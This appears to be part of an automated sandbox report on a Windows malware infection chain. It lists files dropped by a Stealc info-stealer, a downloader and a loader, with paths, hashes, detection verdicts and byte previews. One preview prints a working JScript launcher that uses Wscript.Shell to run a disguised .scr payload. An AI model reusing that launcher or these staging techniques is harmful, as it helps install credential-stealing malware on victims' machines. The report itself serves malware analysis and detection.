Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: oZ7nac01Em.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: WGo3ga1AL9.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	999
Entropy (8bit):	4.966299883488245
Encrypted:	false
SSDEEP:	24:Jd4T7gw4TchTGBLtKEHcHGuDyeHRuDye6MGFiP6euDyRtz:34T53VGLv8HGuDyeHRuDye6MGFiP6euy
MD5:	24567B9212F806F6E3E27CDEB07728C0
SHA1:	371AE77042FFF52327BF4B929495D5603404107D
SHA-256:	82F352AD3C9B3E58ECD3207EDC38D5F01B14D968DA908406BD60FD93230B69F6
SHA-512:	5D5E65FCD9061DADC760C9B3124547F2BABEB49FD56A2FD2FE2AD2211A1CB15436DB24308A0B5A87DA24EC6AB2A9B0C5242D828BE85BD1B2683F9468CE310904
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<software_identification_tag xmlns="http://standards.iso.org/iso/19770/-2/2009/schema.xsd">...<entitlement_required_indicator>true</entitlement_required_indicator>...<product_title>Windows 10 Pro</product_title>...<product_version>....<name>10.0.19041.1865</name>....<numeric>.....<major>10</major>.....<minor>0</minor>.....<build>19041</build>.....<review>1865</review>....</numeric>...</product_version>...<software_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_creator>...<software_licensor>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_licensor>...<software_id>....<unique_id>Windows-10-Pro</unique_id>....<tag_creator_regid>regid.1991-06.com.microsoft</tag_creator_regid>...</software_id>...<tag_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</tag_creator>..</software_identification_tag>..

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js

Download File

Process:	C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	181
Entropy (8bit):	4.742100137639424
Encrypted:	false
SSDEEP:	3:RiMIpGXIdPHo55wWAX+d4a+kEkD5iXltLwvHFZo5uWAX+d4a+kEkD5iXltUM:RiJBJHonwWD+vkDQtMHFywWD+vkDQth
MD5:	6EB11F5D13882A35925C4B6D64D83503
SHA1:	2D113C2F48122933B501877B5C2D071CB75A3ED4
SHA-256:	E9CAB2F866683674A4E8BF8854B54EB132A6B931BDDA7066C4A6515C9EA9B1B0
SHA-512:	B8262B04E3BF2E8238D45814BCD77B03DD66C2EB82944BFA6410D12BD00DFF4FF3EF18411F915805118DA17950F557824729D4529A675A2212758BBE52E77263
Malicious:	true
Preview:	new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\GreenTech Dynamics\\EcoCraft.scr\" \"C:\\Users\\user\\AppData\\Local\\GreenTech Dynamics\\O\"")

C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr

Download File

Process:	C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\GreenTech Dynamics\O

Download File

Process:	C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif
File Type:	data
Category:	dropped
Size (bytes):	594650
Entropy (8bit):	7.9996649139256055
Encrypted:	true
SSDEEP:	12288:38tfmUx7zSsIfrhCw5PeXvQXFSSdHDBu4ceeEl2a/uJ2:38hxasKfPeXv4AgHFu4c4l9/Z
MD5:	4B0812FABC1BA34D8D45D28180F6C75F
SHA1:	B9D99C00A6F9D5F23E244CC0555F82A7D0EEB950
SHA-256:	73312C3EA63FAF89E2067E034A9148BF73EFB5140C1BA6A67AAF62170EE98103
SHA-512:	7F72FFD39F7B66EA701EC642A427C90F9C3EE9BE69A3E431C492BE76AE9A73E8B2B1FBB16553A5A6D8722BAF30B2A392A47C7C998D618459BF398D47D218D158
Malicious:	false
Preview:	A@2..3Y.....8p.!..L.[...`..b..f^..J....P@....;.:.."....g...Tz.....T%.R.G.....0$.....n.....r0....R-A..z.N..jK...y.....;.EWs.@b....{....Y9p.)J.....s ;..9.j.........X.K..\|...e..i...`.c..U.h..%...[..b.....n..:Y....M........W>H.....?..O.[......{...7.....C/.!0..\|[&....f.q......}..Q.....+-o.y./T...%..K...vl;4..z."...k:..2[.v.o..{..c5...%...:..kZU1.J?..TI...!...\3_..&L.[{..4..G>..;.%..'...6.q..2....V_.^.....R...g.......<..%.5.j..3.-.o.aj..............j.8aw.6_e}....Z".WLw"S...,....'..6...P.=..xckw}......b..K..h..ad....m{&h...;.o.yR..9.....Q..E.b.....2m..E.r.N..8.u.Q4.m..ht.ck.&f.g...$.....3by..B.V1#.G..y..IL.j......2...\..A..^..T.5....+...W=.Z.[.z....X`.&..z.h...B....\|xs..H&X..Nv..k.5.s.Z...:~9.V.M.PO&.@..m....P.K......".Ju..?.._:%qp.ON..q.....c.AN$N..-MB.q..-.hz.+..O.B.+<~...f..V..5.C"EY..=D..\|.....;.e.\|.g.0.^i..f.._e:...0/.....'.[.........A.1.RY.6}..l.Kf....$.7.N...[ml.W......[.$...p..[H>.+....}.H.....\H2[.'.p......./..z.@...J....-....

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\f55899dae2.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\GOLD1234[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	660480
Entropy (8bit):	7.64329230449762
Encrypted:	false
SSDEEP:	12288:UuM8OZLrEIC6jejDTN2kNhqqitQ+jHKVkdvXPg9O/1ACWFtIC5NcDU:dI4I50fsYqqitSkxPg41Xgtp5WDU
MD5:	BDF3C509A0751D1697BA1B1B294FD579
SHA1:	3A3457E5A8B41ED6F42B3197CFF53C8EC50B4DB2
SHA-256:	D3948AE31C42FCBA5D9199E758D145FF74DAD978C80179AFB3148604C254BE6D
SHA-512:	AA81CCBAE9F622531003F1737D22872AE909B28359DFB94813A39D74BDE757141D7543681793102A1DC3DCAECEA27CFFD0363DE8BBB48434FCF8B6DAFEF320B3
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...q. g..........................................@.......................................@.....................................(............................0... ..........................`u......x...................P............................text............................... ..`.rdata..............................@..@.data....1..........................@....00cfg..............................@..@.tls......... ......................@....reloc... ...0..."..................@..B.call........`..........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\new_v8[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5952512
Entropy (8bit):	7.874022549731662
Encrypted:	false
SSDEEP:	98304:S1DARPEaQuozISL3R0yFmGPwnvYw9iyiqWAWjuQCmtGlSliMhabgxEA:oFzuCII9CniytWjuQTtASl9hasb
MD5:	5009B1EF6619ECA039925510D4FD51A1
SHA1:	22626AA57E21291A995615F9F6BBA083D8706764
SHA-256:	FBC8C32BF799A005C57540A2E85DD3662ED5795A55F11495F0BA569BBB09DF59
SHA-512:	2B5BBD9449BE00588058966DB487C0ADFAC764827A6691F6A9FC6C3A770A93BDA11C732D2EB2A3C660697CBC69B1C71A2BF76D2957F65CD2599FB28098B24F14
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............K...........@..........................P........[...@...................................>......`.......................P..\.................................................... 0..............................text....I.......................... ..`.rdata..=%...`......................@..@.data...............................@....vmp.+........................... ..`.vmp.+d.... 0.....................@....vmp.+P.X..00...X................. ..`.reloc..\....P......."X.............@..@.rsrc........`.......X.............@..@........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	2874880
Entropy (8bit):	6.557349853737172
Encrypted:	false
SSDEEP:	49152:KB88yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy4:KBrWV0C6DVlt8HeUjoT7gH
MD5:	DA2EA6B51A3216E065B2CED231C9E57F
SHA1:	EE7EA72BD395654CB1126D9445A130B9BCBC21F0
SHA-256:	55A539C066DCCA8B451445A6BC712FED79B4984297E86E629FBB74E50256FA8E
SHA-512:	7C72F9DCF959DE9F012DD06841F6E3DEFA892A5F3AB5ED20A667D4FAC0C613B8E5CE34699590D720FD7A38FB7F62FFC7DC77AA027713FAD558EB84F371A49ABB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J........................@.......................... /.......+...@.................................T...h.......@........................................................................................................... . .........~..................@....rsrc...@...........................@....idata ............................@...wjqxmzgq.0)......$).................@...xobrrexd..............+.............@....taggant.0......."....+.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\RDX123456[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	334848
Entropy (8bit):	6.761223756666625
Encrypted:	false
SSDEEP:	6144:+tWC7xvtddofKKrybbuMY88Jc/oZ3ipoOvYcOCL7E6tt7thlp4:+RZtddofKKrzHPJ3ii0bL7E6t7Z2
MD5:	FBA8F56206955304B2A6207D9F5E8032
SHA1:	F84CBCC3E34F4D2C8FEA97C2562F937E1E20FE28
SHA-256:	11227EAD147B4154C7BD21B75D7F130B498C9AD9B520CA1814C5D6A688C89B1B
SHA-512:	56E3A0823A7ABE08E1C9918D8FA32C574208B462B423AB6BDE03345C654B75785FDC3180580C0D55280644B3A9574983E925F2125C2D340CF5E96B98237E99FA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g.................D........................@.......................................@.................................R....................................K...................................................................................text....B.......D.................. ..`.rdata..'%...`...&...H..............@..@.data............b...n..............@....reloc...K.......L..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	526848
Entropy (8bit):	7.806472978332927
Encrypted:	false
SSDEEP:	12288:NL07gVkGXreL4LV8wdljMagCkqZBtzPmmhwAoXC+YF:Nw7g6GXrnFkm1PmmBqC+YF
MD5:	26D8D52BAC8F4615861F39E118EFA28D
SHA1:	EFD5A7CCD128FFE280AF75EC8B3E465C989D9E35
SHA-256:	8521A1F4D523A2A9E7F8DDF01147E65E7F3FF54B268E9B40F91E07DC01FA148F
SHA-512:	1911A21D654E317FBA50308007BB9D56FBA2C19A545EF6DFAADE17821B0F8FC48AA041C8A4A0339BEE61CBD429852D561985E27C574ECED716B2E937AFA18733
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....E..........."...0.................. ... ....@.. .......................`............@.....................................O.... ..L....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...L.... ......................@..@.reloc.......@......................@..B........................H........(...............>..............................................6.(.....(....z.,..{....,..{....o......(........0...........s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s ...}.....s!...}.....("....{.... .....Ws#...o$....{....r...po%....{.... ......s&...o'....{.....o(....{.... (... ....s#...o$....{....r...po%....{.... ......s&...o'....{..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	314368
Entropy (8bit):	6.339215930674792
Encrypted:	false
SSDEEP:	6144:k0wBiMDYtUokCulxMfpbjnekAoQGZRFsnE7w+Uw3NKR9hU/W9:RwMtUoH35nLP7Fa4wx8KRF9
MD5:	68A99CF42959DC6406AF26E91D39F523
SHA1:	F11DB933A83400136DC992820F485E0B73F1B933
SHA-256:	C200DDB7B54F8FA4E3ACB6671F5FA0A13D54BD41B978D13E336F0497F46244F3
SHA-512:	7342073378D188912B3E7C6BE498055DDF48F04C8DEF8E87C630C69294BCFD0802280BABE8F86B88EAED40E983BCF054E527F457BB941C584B6EA54AD0F0AA75
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C..............X......m.......Y.......p.....y.........`...............\......n.....Rich............PE..L...K..g......................$......i............@...........................&...........@.................................@...<.............................%..$...................................................................................text............................... ....rdata..............................@..@.data.....#.........................@....reloc...E....%..F..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
